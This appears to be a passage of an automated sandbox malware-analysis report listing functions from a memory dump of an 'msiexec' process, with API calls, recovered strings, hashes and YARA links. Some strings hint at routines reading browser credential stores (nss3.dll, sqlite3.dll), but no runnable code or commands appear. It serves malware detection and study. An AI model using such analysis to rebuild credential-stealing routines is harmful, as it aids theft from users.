                                                              • Instruction Fuzzy Hash: 090196367012166F8B185F69DD9489F7EAEFB853913084136FC05C6361EB71C9818ED8
                                                              Function 00406620 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 50COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 00406640
                                                                • Part of subcall function 004063B2: memset.MSVCRT ref: 0040644F
                                                                • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                              • memcmp.MSVCRT(?,00456EA0,00000010,?,?,?,00000060,?,?,00000000,00000000), ref: 00406672
                                                              • memcpy.MSVCRT(?,?,00000018,?,00000060,?,?,00000000,00000000), ref: 00406695
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpy$memset$memcmp
                                                              • String ID: Ul@
                                                              • API String ID: 270934217-715280498
                                                              • Opcode ID: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                              • Instruction ID: 50cfa42ee3f36d69bd2a91aaf20a03d2fa08f341615043147a7a382cdea3e611
                                                              • Opcode Fuzzy Hash: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                              • Instruction Fuzzy Hash: 46017572A0020C6BEB10DAA58C06FEF73ADAB44705F450436FE49F2181E679AA1987B5
                                                              Function 0040B903 Relevance: 6.0, APIs: 4, Instructions: 45windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001), ref: 00408EBE
                                                              • sprintf.MSVCRT ref: 0040B929
                                                              • SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                                                                • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403F8E,0044C530), ref: 00408E31
                                                                • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                              • sprintf.MSVCRT ref: 0040B953
                                                              • _mbscat.MSVCRT ref: 0040B966
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: sprintf$LoadMessageSendString_mbscat_mbscpymemcpystrlen
                                                              • String ID:
                                                              • API String ID: 203655857-0
                                                              • Opcode ID: e7a96a4b3b60773b868b861c6ef1878d2d31708076d5e2e16fac633899c29946
                                                              • Instruction ID: 0d6227c2dffbdb2154d3321facad49e181a647ebd34d8d5e6c5aab0b846496ed
                                                              • Opcode Fuzzy Hash: e7a96a4b3b60773b868b861c6ef1878d2d31708076d5e2e16fac633899c29946
                                                              • Instruction Fuzzy Hash: EE0117B2500308A6E721EB75DC87FE773ACAB54704F04046AB659B61C3DA78E5444A59
                                                              Function 0040ADC5 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 0040ADE8
                                                              • memset.MSVCRT ref: 0040ADFE
                                                                • Part of subcall function 0040A4E6: _mbscpy.MSVCRT(00000000,?,0040ABD2,?,?,?), ref: 0040A4EB
                                                                • Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E
                                                              • sprintf.MSVCRT ref: 0040AE28
                                                                • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040AB7D,?,<item>), ref: 00406D4D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
                                                              • String ID: </%s>
                                                              • API String ID: 3699762281-259020660
                                                              • Opcode ID: f78139877eceb876a4a519055c942f2d4715b4df0d29a6dcbc188ebede795ba7
                                                              • Instruction ID: ff04cb2e9b10d1c503b051559ee948e99af9d8289afd69eb184e92e88926625d
                                                              • Opcode Fuzzy Hash: f78139877eceb876a4a519055c942f2d4715b4df0d29a6dcbc188ebede795ba7
                                                              • Instruction Fuzzy Hash: CF01F97290012967E721A619CC46FDEB76C9F54304F0500FAB50DF3142DA74AA448BA5
                                                              Function 0041865B Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 243COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 004176F4: memcmp.MSVCRT(?,0044F118,00000008), ref: 004177B6
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418726
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418770
                                                              Strings
                                                              • recovered %d pages from %s, xrefs: 004188B4
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$memcmp
                                                              • String ID: recovered %d pages from %s
                                                              • API String ID: 985450955-1623757624
                                                              • Opcode ID: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                                              • Instruction ID: 98aa3c95e39363207900286e283e4ca218167c091a2ac8f6aa08d387a6555cb7
                                                              • Opcode Fuzzy Hash: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                                              • Instruction Fuzzy Hash: BA81AF759006049FDB25DBA8C880AEFB7F6EF84324F25441EE95597381DF38AD82CB58
                                                              Function 004021FF Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _ultoasprintf
                                                              • String ID: %s %s %s
                                                              • API String ID: 432394123-3850900253
                                                              • Opcode ID: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                                                              • Instruction ID: 5b4e28b1b4fc8494891684f3550fd3cb18a3cec27640a2844273e51cea36df92
                                                              • Opcode Fuzzy Hash: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                                                              • Instruction Fuzzy Hash: 80412331504A15C7C93595648B8DBEBA3A8BB46300F5804BFDCAAB32C0D3FCAD42865E
                                                              Function 00409901 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 00409919
                                                              • SendMessageA.USER32(N\@,00001019,00000000,?), ref: 00409948
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: MessageSendmemset
                                                              • String ID: N\@
                                                              • API String ID: 568519121-3851889168
                                                              • Opcode ID: 2010a019ef781dd6939f17f8e62f95d5074ac9a6fd296138cb71cbff55b3af76
                                                              • Instruction ID: 8500237f8b168207f1c9a25e89cff2ec53edf3448a21c69821c5a9264d9502ca
                                                              • Opcode Fuzzy Hash: 2010a019ef781dd6939f17f8e62f95d5074ac9a6fd296138cb71cbff55b3af76
                                                              • Instruction Fuzzy Hash: 3C016279800205AADB209F59C845AEBB7F8FF85B45F00802DE894B6241D374A945CB79
                                                              Function 00409070 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadMenuA.USER32(00000000), ref: 00409078
                                                              • sprintf.MSVCRT ref: 0040909B
                                                                • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                                                                • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                                                                • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                                                                • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                                                                • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                                                                • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                                                                • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                                              • String ID: menu_%d
                                                              • API String ID: 1129539653-2417748251
                                                              • Opcode ID: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                              • Instruction ID: bbc3668ae8aad1463aedfde5e5dd5b48340f77aa4c3989790123ead7330def9b
                                                              • Opcode Fuzzy Hash: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                              • Instruction Fuzzy Hash: 2ED0C260A4124036EA2023366C0AF4B1A099BC271AF14022EF000B20C3EBFC844482BE
                                                              Function 004116E1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              • failed memory resize %u to %u bytes, xrefs: 00411706
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _msizerealloc
                                                              • String ID: failed memory resize %u to %u bytes
                                                              • API String ID: 2713192863-2134078882
                                                              • Opcode ID: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                                              • Instruction ID: 6d708a2afe7937de994116278d2c06faa365a3e4d7322368aba5da3f7b150b0b
                                                              • Opcode Fuzzy Hash: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                                              • Instruction Fuzzy Hash: DBD0C2329092107EEB152250AC03B5FAB51DB80374F25850FF658451A1E6795C108389
                                                              Function 004097FF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00406F96: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,00409805,00000000,00409723,?,00000000,00000104), ref: 00406FA1
                                                              • strrchr.MSVCRT ref: 00409808
                                                              • _mbscat.MSVCRT ref: 0040981D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: FileModuleName_mbscatstrrchr
                                                              • String ID: _lng.ini
                                                              • API String ID: 3334749609-1948609170
                                                              • Opcode ID: 98f2440ea2097efbff780d18735bc8e6eaa27cf1360ec9cb317463341ca83b29
                                                              • Instruction ID: 627d3aba04136714d7c1818045af5338c576ea1e6c84acb30438f8bc90b354f8
                                                              • Opcode Fuzzy Hash: 98f2440ea2097efbff780d18735bc8e6eaa27cf1360ec9cb317463341ca83b29
                                                              • Instruction Fuzzy Hash: 73C080019497D018F12235212D03F4F06884F83709F34005FF801796C3EF9CA611407F
                                                              Function 004070E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                              • _mbscat.MSVCRT ref: 004070FA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _mbscat$_mbscpystrlen
                                                              • String ID: sqlite3.dll
                                                              • API String ID: 1983510840-1155512374
                                                              • Opcode ID: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                                              • Instruction ID: ab8058c300e11a65186fba7fca0927c942ef8f40a12134081a956aaad4b84faf
                                                              • Opcode Fuzzy Hash: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                                              • Instruction Fuzzy Hash: 42C0803340517035770276717D03A9F794DCF81355B01045AF54451112F529891241EB
                                                              Function 004033B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfileString
                                                              • String ID: A4@$Server Details
                                                              • API String ID: 1096422788-4071850762
                                                              • Opcode ID: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                              • Instruction ID: 3fa8da6ebb007cc1aa22036e73777017e29eb1af1cc7e931feee2a89adc62c4b
                                                              • Opcode Fuzzy Hash: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                              • Instruction Fuzzy Hash: C8C08C32189301BAEA418F80AD46F0EBBA2EBA8B00F044409B244200A682B94020EF17
                                                              Function 0042C821 Relevance: 5.2, APIs: 4, Instructions: 185COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memcpy.MSVCRT(?,?,0000201C), ref: 0042C8E0
                                                              • memcpy.MSVCRT(?,?,?), ref: 0042C917
                                                              • memset.MSVCRT ref: 0042C932
                                                              • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0042C96E
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpy$memset
                                                              • String ID:
                                                              • API String ID: 438689982-0
                                                              • Opcode ID: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                                                              • Instruction ID: 02088d5bd302ba8124152156f4c24fba1fa2279ed4138068a4a2dd0dfc44ef6b
                                                              • Opcode Fuzzy Hash: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                                                              • Instruction Fuzzy Hash: BC61BDB2604712AFD710DF65E8C1B2BB7E5FF84304F40892EF99896250D338E955CB9A
                                                              Function 0040848B Relevance: 5.1, APIs: 4, Instructions: 104stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • strlen.MSVCRT ref: 0040849A
                                                              • memset.MSVCRT ref: 004084D2
                                                              • memcpy.MSVCRT(?,00000000,?,?,?,?,67E97B60,?,00000000), ref: 0040858F
                                                              • LocalFree.KERNEL32(00000000,?,?,?,?,67E97B60,?,00000000), ref: 004085BA
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: FreeLocalmemcpymemsetstrlen
                                                              • String ID:
                                                              • API String ID: 3110682361-0
                                                              • Opcode ID: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                                                              • Instruction ID: 01a4a4a03dd67d82f411e1dd6e1cb40c430aa3add0a741e9cb7308dd065d79ab
                                                              • Opcode Fuzzy Hash: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                                                              • Instruction Fuzzy Hash: A331E572D0011DABDB10DB68CD81BDEBBB8EF55314F1005BAE944B7281DA38AE858B94
                                                              Function 004161CB Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memcpy.MSVCRT(?,?,00000010), ref: 004161F4
                                                              • memcpy.MSVCRT(?,?,00000004), ref: 00416218
                                                              • memcpy.MSVCRT(?,?,00000004), ref: 0041623F
                                                              • memcpy.MSVCRT(?,?,00000008), ref: 00416265
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpy
                                                              • String ID:
                                                              • API String ID: 3510742995-0
                                                              • Opcode ID: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                              • Instruction ID: 2ace43f3ece935e7cd0bce4b95d7f51bbc88ae08637005f1eff78ef908a12d17
                                                              • Opcode Fuzzy Hash: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                              • Instruction Fuzzy Hash: 4B1189B3E002186BEB00EFA5DC49EDEB7ACEB59311F454536FA05DB141E634E648C7A8
                                                              Function 0040998E Relevance: 5.1, APIs: 4, Instructions: 65COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 004073B3: memset.MSVCRT ref: 004073C1
                                                              • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,?,0040402E,00000000,?,0040CD2D), ref: 004099A3
                                                              • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,?,0040402E,00000000,?,0040CD2D), ref: 004099CC
                                                              • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,?,0040402E,00000000,?,0040CD2D), ref: 004099ED
                                                              • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,?,0040402E,00000000,?,0040CD2D), ref: 00409A0E
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ??2@$memset
                                                              • String ID:
                                                              • API String ID: 1860491036-0
                                                              • Opcode ID: 53a709b0ebb70c131a26b1f3e55d335129ca60e454a525cf22a7fedf29ded436
                                                              • Instruction ID: ded700a689dc4ea077b1bf28e8ae47d2b9e76a7afd7a7e1dd26f08861e755b16
                                                              • Opcode Fuzzy Hash: 53a709b0ebb70c131a26b1f3e55d335129ca60e454a525cf22a7fedf29ded436
                                                              • Instruction Fuzzy Hash: 0B21B6B0A547508EE7558F6A9845A16FAE4FFD0710726C8AFD109DB2B2E7B8D8408F14
                                                              Function 0040796E Relevance: 5.1, APIs: 4, Instructions: 63stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • strlen.MSVCRT ref: 0040797A
                                                              • free.MSVCRT ref: 0040799A
                                                                • Part of subcall function 00406F30: malloc.MSVCRT ref: 00406F4C
                                                                • Part of subcall function 00406F30: memcpy.MSVCRT(00000000,00000000,?,00000000,?,004045BE,00000001,?,?,00000000,00401B21,?), ref: 00406F64
                                                                • Part of subcall function 00406F30: free.MSVCRT ref: 00406F6D
                                                              • free.MSVCRT ref: 004079BD
                                                              • memcpy.MSVCRT(00000001,?,00000000,?,?,?,?,00000000,0044357F,00000000,?,?,00000000,0044386F,?,?), ref: 004079DD
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: free$memcpy$mallocstrlen
                                                              • String ID:
                                                              • API String ID: 3669619086-0
                                                              • Opcode ID: defd1bd1be5bbd5284309495682469d6dd103d7cb5d76ad0db5bff9d1363c284
                                                              • Instruction ID: 28856836b01dc1c1490a34e4127c9d88e875caa212a522c6554fbe506b42c8ef
                                                              • Opcode Fuzzy Hash: defd1bd1be5bbd5284309495682469d6dd103d7cb5d76ad0db5bff9d1363c284
                                                              • Instruction Fuzzy Hash: A211CDB1604600EFD720DF18D880E9AB7F5EF48328B108A2EE852A76D1C735F8158B59
                                                              Function 00408D34 Relevance: 5.0, APIs: 4, Instructions: 36COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ??2@YAPAXI@Z.MSVCRT(00008000,00408DC4,00403F8E,0044C530), ref: 00408D5C
                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,00008000,00408DC4,00403F8E,0044C530), ref: 00408D7A
                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,00408DC4,00403F8E,0044C530), ref: 00408D98
                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,00408DC4,00403F8E,0044C530), ref: 00408DA8
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ??2@
                                                              • String ID:
                                                              • API String ID: 1033339047-0
                                                              • Opcode ID: 1226329fef66c94fa82ba57e72c46c46c6e0dffed67700a76cfead9af7fedf55
                                                              • Instruction ID: b7305a6f8e60e4354fc193aeb8e5872e67636dbc7b7f4d43fc505f02bd19535d
                                                              • Opcode Fuzzy Hash: 1226329fef66c94fa82ba57e72c46c46c6e0dffed67700a76cfead9af7fedf55
                                                              • Instruction Fuzzy Hash: EEF031F05433615EEB559F34ED0672536A4E784302F024B3EE2059A2E6EB78D4908B09